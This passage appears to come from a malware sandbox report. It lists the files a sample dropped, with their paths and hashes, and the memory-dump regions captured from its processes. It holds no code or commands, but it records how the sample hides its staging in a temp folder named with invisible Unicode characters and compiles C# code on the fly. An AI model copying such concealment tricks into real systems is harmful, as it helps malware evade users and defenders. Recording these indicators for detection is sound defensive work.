495bbbf3f2bdca21cefbd7d5ea809b918870c4663b5d8f38a9ca294df1eddabf

SHA512
356feb7dbd7c87958086afb36173c0b110847772e06ac532898b5e3642d22ed135a467fc2dd047abbf3571540775f20d7d6207f8a777dab5c6e82bf31d411427

Download Submit
C:\Users\Admin\AppData\Local\Temp\‍ ‏ ‏ \Common Files\Desktop\ResolveExport.docx

Filesize
18KB

MD5
b28b4cba88903ba70d041c721010836d

SHA1
0737575b31b7f993bbe0ed09da70752ef220bc9a

SHA256
ab2ef377d49ceb642aa5650c731424ff8ad8d1b4dd3c1b13c467e92a3e90e189

SHA512
639a96541bddf478c60884c5a8cbec8ecdf2f06ac69af0e7e986b82f67dcc2dd2b0465b479de93558a612b2fe08e38981c01a4f4433f6d6b93c3cf1c923c293e

Download Submit
C:\Users\Admin\AppData\Local\Temp\‍ ‏ ‏ \Common Files\Desktop\SendWrite.docx

Filesize
20KB

MD5
51aad06c3ae37e84a76299c07254988c

SHA1
c092453d608e73cef5d4947cda0c5fc1c5ed5ef2

SHA256
144735e94a16a3cd43658a0782e985978148ef0706a7ff61e4f09e03cdbc5781

SHA512
89ed35b8bf029f868a99793410a577e8de3cbd272e21eaed014472e698243a5ca4012f2c406fcfb73d93ff062f561a13a093e9e8a469301fb4cd53571e84f78f

Download Submit
C:\Users\Admin\AppData\Local\Temp\‍ ‏ ‏ \Common Files\Desktop\WriteConfirm.xlsx

Filesize
12KB

MD5
3fd7171b9b4c3b9ad2db294d0042fc31

SHA1
51c3945374dad8919671f0e505f7c6fa6cca9f18

SHA256
e3bcc3d8a5d90a916adbf86adcbf8b6160caceefdcc13491586ad6865f104d83

SHA512
83afd863835d67d9bcdee6a5260a9b821b2d4b13416149cb871ff50cc175d9b84af291a3db60040840c3afd0b058f1d6877e575e5cc940a2b312f3312bba05b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\‍ ‏ ‏ \Common Files\Documents\BackupApprove.ppsm

Filesize
940KB

MD5
7812a2383e421ee5bbb777513bb13555

SHA1
e67ef33854d7e364389d88d73a5131910791c84a

SHA256
69f4d3099b2312649d75bc8ee24ab016095ddc6477e295035d1f9561c2d34390

SHA512
e2a290b71f37d09b46de7ff85e0dba0bc1fad43e11a384371f18e16b2bed3a47888c57d41c723eca74b3538231346805ac3e9b8969be9242a65a1a8daa466f6a

Download Submit
C:\Users\Admin\AppData\Local\Temp\‍ ‏ ‏ \Common Files\Documents\EditOptimize.xlsx

Filesize
10KB

MD5
316c506042ef5c1179208c5c2cedac4b

SHA1
b2f16ef4313efd0a6a98ed8852fda0aecda7e2e2

SHA256
de09642631a6470297bf1ab68c684645174934e46cc9895fbdbc7756eabf92c7

SHA512
b392e1f8f33905dd07a3f03ee47459ce823cf8f7ba6cdc1f3f4c6df83e46cc5c22c57e3cf90d5525e8f74964d383a151074a991c083304e4cc4a35ccfab5d2f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\‍ ‏ ‏ \Common Files\Documents\ExpandStart.docx

Filesize
13KB

MD5
32adee4d523d15bd1e7d2125f63aef57

SHA1
6e7d1c846749dd8c84f216dd608327b4a2a35063

SHA256
028285c2ea139799595e64bd2a7258f6ca68a54769290f361638a3a50b57947b

SHA512
cf81566172dc5d2322ac2f911212742feaeb5338dd64c64a1e4d57ab936f4979fd191895a7c228da735003438020f5eeaf1b1b8edb53ab4ffa07b2948ce469b7

Download Submit
C:\Users\Admin\AppData\Local\Temp\‍ ‏ ‏ \Common Files\Documents\PushFormat.docx

Filesize
20KB

MD5
5bbd6ee6bdccc3cd2567a5367e1aec6c

SHA1
0cc2dd0bb872ceae9d867467196383007a6be62a

SHA256
31ce274a6cebf33f8581ea47ee97b4067264f1d5e2e7ee77643604532dacddec

SHA512
5eb47e53e5b3971c3b04f0c63071afef85253da620e7c4f5f5ebf5107a5df69270ae2e826d10ca04f6d19f2877359b3218d185944fd5d6a214f7e4095e88757b

Download Submit
C:\Users\Admin\AppData\Local\Temp\‍ ‏ ‏ \Common Files\Documents\ReadRestart.csv

Filesize
1.8MB

MD5
6bb387bcd6eb13988cb47d9360993d0c

SHA1
7ea816e513ce8db5f2282e76624c4df4af3fd23d

SHA256
a0d119c96ac6cd05eaf7505539a45521f249f1477f4e477d78c683e0c65ad9c5

SHA512
48771d935a35a3e76a1215acd0f4184ec8dc25eb6d433a029fc210810d644a99096b7e8eb9b552d0fc88c50db586a6e9a0d439164633d16056ed8a5b544fa4fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\‍ ‏ ‏ \Common Files\Documents\SkipJoin.xlsx

Filesize
13KB

MD5
2f1050076014064b09e206fe048cf2d3

SHA1
ada9e5f79cff080d0d96e57b028ecee9820cdc39

SHA256
ff5bedbd58f216a32b05613ca3ae6372b940e41b258f46deb51a0176843d66fd

SHA512
3a0a0dc9835c9dc3adbef5bd40ad686ca455e0e57433b7eb5df9b89448cafb012f7c189e56e599b62890c00b0d07cbaaaaed3bc8d020332b04ed5c25b5b3a438

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tfryh2pd\CSCAB7B6B38BB704771A7FD9F98D951B15F.TMP

Filesize
652B

MD5
d9df3660ca6b1e11ecdd2754e08bdb38

SHA1
a8ec508f68067e934818f1fc0c01fcc239ba417a

SHA256
b70a98c649b03e434363dc7cdc5ab96d6a914f57d4de6e9325f30aee76f01438

SHA512
37b03f9be1af865330b2be5127648ee38c41fc52e72fcdd82c591af76dbd355cf2090a40edc1b0922f88743a37ff49ec428668f4dabca2ee1a883b973c2389d3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tfryh2pd\tfryh2pd.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tfryh2pd\tfryh2pd.cmdline

Filesize
607B

MD5
9e5e028bad494919705df8b00bc82205

SHA1
5c32062432c84888a0bfa2e889068ea90cd7f7d0

SHA256
c55f05869c0d7e44af451f8c5877424e52fd0f1666a91d02fd2c2e2d80a89ac5

SHA512
23ebb7375f39550b7b90804d0c1e7ba629dcb125b233bd48549f1585af59e3d98696dbff3f2c82a6c2744449c238deb588f705bcfa77a3fbaae577894ea17014

Download Submit
memory/1164-194-0x00007FFCC9EE0000-0x00007FFCCA9A1000-memory.dmp

Filesize
10.8MB

Download
memory/1164-82-0x00007FFCC9EE3000-0x00007FFCC9EE5000-memory.dmp

Filesize
8KB

Download
memory/1164-83-0x00007FFCC9EE0000-0x00007FFCCA9A1000-memory.dmp

Filesize
10.8MB

Download
memory/1164-84-0x00007FFCC9EE0000-0x00007FFCCA9A1000-memory.dmp

Filesize
10.8MB

Download
memory/1164-95-0x000001A551750000-0x000001A551772000-memory.dmp

Filesize
136KB

Download
memory/4300-60-0x00007FFCDAB50000-0x00007FFCDACCE000-memory.dmp

Filesize
1.5MB

Download
memory/4300-168-0x00007FFCDAB50000-0x00007FFCDACCE000-memory.dmp

Filesize
1.5MB

Download
memory/4300-72-0x00007FFCCB1B0000-0x00007FFCCB6D9000-memory.dmp

Filesize
5.2MB

Download
memory/4300-242-0x00007FFCDC160000-0x00007FFCDC16D000-memory.dmp

Filesize
52KB

Download
memory/4300-80-0x00007FFCCB090000-0x00007FFCCB1AB000-memory.dmp

Filesize
1.1MB

Download
memory/4300-74-0x00007FFCDF600000-0x00007FFCDF625000-memory.dmp

Filesize
148KB

Download
memory/4300-341-0x00007FFCCBBF0000-0x00007FFCCC2B5000-memory.dmp

Filesize
6.8MB

Download
memory/4300-69-0x00007FFCCBBF0000-0x00007FFCCC2B5000-memory.dmp

Filesize
6.8MB

Download
memory/4300-70-0x00007FFCDB330000-0x00007FFCDB363000-memory.dmp

Filesize
204KB

Download
memory/4300-283-0x00007FFCDB330000-0x00007FFCDB363000-memory.dmp

Filesize
204KB

Download
memory/4300-284-0x000002011D5C0000-0x000002011DAE9000-memory.dmp

Filesize
5.2MB

Download
memory/4300-285-0x00007FFCCB1B0000-0x00007FFCCB6D9000-memory.dmp

Filesize
5.2MB

Download
memory/4300-286-0x00007FFCCB6E0000-0x00007FFCCB7AD000-memory.dmp

Filesize
820KB

Download
memory/4300-71-0x000002011D5C0000-0x000002011DAE9000-memory.dmp

Filesize
5.2MB

Download
memory/4300-63-0x00007FFCDB370000-0x00007FFCDB389000-memory.dmp

Filesize
100KB

Download
memory/4300-64-0x00007FFCDC160000-0x00007FFCDC16D000-memory.dmp

Filesize
52KB

Download
memory/4300-76-0x00007FFCDB310000-0x00007FFCDB324000-memory.dmp

Filesize
80KB

Download
memory/4300-58-0x00007FFCDB510000-0x00007FFCDB534000-memory.dmp

Filesize
144KB

Download
memory/4300-56-0x00007FFCDB780000-0x00007FFCDB79A000-memory.dmp

Filesize
104KB

Download
memory/4300-54-0x00007FFCDB540000-0x00007FFCDB56D000-memory.dmp

Filesize
180KB

Download
memory/4300-48-0x00007FFCE0800000-0x00007FFCE080F000-memory.dmp

Filesize
60KB

Download
memory/4300-30-0x00007FFCDF600000-0x00007FFCDF625000-memory.dmp

Filesize
148KB

Download
memory/4300-25-0x00007FFCCBBF0000-0x00007FFCCC2B5000-memory.dmp

Filesize
6.8MB

Download
memory/4300-73-0x00007FFCCB6E0000-0x00007FFCCB7AD000-memory.dmp

Filesize
820KB

Download
memory/4300-78-0x00007FFCDB8D0000-0x00007FFCDB8DD000-memory.dmp

Filesize
52KB

Download
memory/4300-85-0x00007FFCDB510000-0x00007FFCDB534000-memory.dmp

Filesize
144KB

Download
memory/4300-81-0x00007FFCDB780000-0x00007FFCDB79A000-memory.dmp

Filesize
104KB

Download
memory/4300-340-0x00007FFCCB090000-0x00007FFCCB1AB000-memory.dmp

Filesize
1.1MB

Download
memory/4300-325-0x00007FFCCBBF0000-0x00007FFCCC2B5000-memory.dmp

Filesize
6.8MB

Download
memory/4300-331-0x00007FFCDAB50000-0x00007FFCDACCE000-memory.dmp

Filesize
1.5MB

Download
memory/4300-326-0x00007FFCDF600000-0x00007FFCDF625000-memory.dmp

Filesize
148KB

Download
memory/4300-365-0x00007FFCDB330000-0x00007FFCDB363000-memory.dmp

Filesize
204KB

Download
memory/4300-366-0x000002011D5C0000-0x000002011DAE9000-memory.dmp

Filesize
5.2MB

Download
memory/4300-364-0x00007FFCDB370000-0x00007FFCDB389000-memory.dmp

Filesize
100KB

Download
memory/4300-363-0x00007FFCDC160000-0x00007FFCDC16D000-memory.dmp

Filesize
52KB

Download
memory/4300-362-0x00007FFCDAB50000-0x00007FFCDACCE000-memory.dmp

Filesize
1.5MB

Download
memory/4300-361-0x00007FFCDB510000-0x00007FFCDB534000-memory.dmp

Filesize
144KB

Download
memory/4300-360-0x00007FFCDB780000-0x00007FFCDB79A000-memory.dmp

Filesize
104KB

Download
memory/4300-359-0x00007FFCDB540000-0x00007FFCDB56D000-memory.dmp

Filesize
180KB

Download
memory/4300-358-0x00007FFCE0800000-0x00007FFCE080F000-memory.dmp

Filesize
60KB

Download
memory/4300-357-0x00007FFCDF600000-0x00007FFCDF625000-memory.dmp

Filesize
148KB

Download
memory/4300-356-0x00007FFCCB6E0000-0x00007FFCCB7AD000-memory.dmp

Filesize
820KB

Download
memory/4300-355-0x00007FFCCB090000-0x00007FFCCB1AB000-memory.dmp

Filesize
1.1MB

Download
memory/4300-354-0x00007FFCDB8D0000-0x00007FFCDB8DD000-memory.dmp

Filesize
52KB

Download
memory/4300-353-0x00007FFCDB310000-0x00007FFCDB324000-memory.dmp

Filesize
80KB

Download
memory/4300-352-0x00007FFCCB1B0000-0x00007FFCCB6D9000-memory.dmp

Filesize
5.2MB

Download
memory/4580-260-0x0000026B48850000-0x0000026B48858000-memory.dmp

Filesize
32KB

Download